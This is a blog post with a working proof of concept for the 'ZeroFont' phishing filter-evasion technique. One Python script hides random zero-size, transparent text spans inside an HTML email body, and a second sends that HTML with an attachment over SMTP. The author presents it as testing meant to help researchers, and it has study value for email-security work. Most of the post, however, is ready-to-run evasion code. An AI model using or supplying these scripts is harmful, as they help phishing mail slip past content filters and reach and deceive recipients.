Sunday, September 30, 2018

ZeroFont Vulnerability Testing and PoC - Updated

Recently a friend of mine published an article called "The ZeroFont Exploit Continues".  He referenced a link at the following location, "http://www.avanan.com/resources/zerofont-phishing-attack".  From this research I was testing to see if I could send an email that is similar to myself.  Though I did not formulate a phishing email I used the above tactics to send a message and it went through.

Below are the scripts that I used to test how "The ZeroFont Exploit Continues"...




#!/usr/bin/python

# Allow the first 50 characters of the message to not have zero fonts.
# Allow for if a link is found within the message to keep the link in tact.

import random

alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
messageSpacing = 50 # How many characters from the beginning to not encode
newMessage = ''
f = open('message.txt', 'r')
for line in f:
    letterCount = 0
    counter = random.randint(1,4)
    htmlChar = False
    for letter in line.replace('\n',''):
        newMessage += letter
        if letter == '<':
            htmlChar = True
            letterCount += 1
            messageSpacing -= 1
        elif letter == '>':
            htmlChar = False
            letterCount += 1
            messageSpacing -= 1
        elif htmlChar == False:
            if messageSpacing > 0:
                messageSpacing -= 1
            elif letterCount >= counter:
                letterCount = 0
                counter = random.randint(1,4)
            elif letterCount == 1:
                randStr = ''
                for i in range(0,random.randint(3,12)):
                    randStr += alphabet[random.randint(0,61)]
                #newMessage += '<span style="FONT-SIZE: 0px">' + randStr + '</span>'
                newMessage += '<span style="font-size:0px;color:transparent">' + randStr + '</span>'
                letterCount += 1
            else:
                letterCount += 1
    newMessage += '<br />'


print "<html><body>"
print newMessage
print "</body></html>"

---
Script to send the Email
---

#!/usr/bin/python

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders

msg = MIMEMultipart('alternative')
msg['Subject'] = "ZeroFont Exploit"
msg['From'] = "from_email"
msg['To'] = "to_email"

# Attach the HTML Message
htmlMsg = ''
f = open('t', 'r')
for line in f:
    htmlMsg += line.strip()
htmlPart = MIMEText(htmlMsg, 'html')
msg.attach(htmlPart)

# Attach an Attachment
f = open('script', 'rb')
filePart = MIMEBase('application', 'octet-stream')
filePart.set_payload((f).read())
encoders.encode_base64(filePart)
filePart.add_header('Content-Disposition', "attachment; filename=script")
msg.attach(filePart)

fromAddress='from_email'
toAddress='to_email'

username='username'
password='password'

server = smtplib.SMTP('smtp.server.com:1527')
server.starttls()
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg.as_string())
server.quit()




These scripts are meant to assist in security researchers thwarting this vulnerability that phishing emails are exploiting in email filters.

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...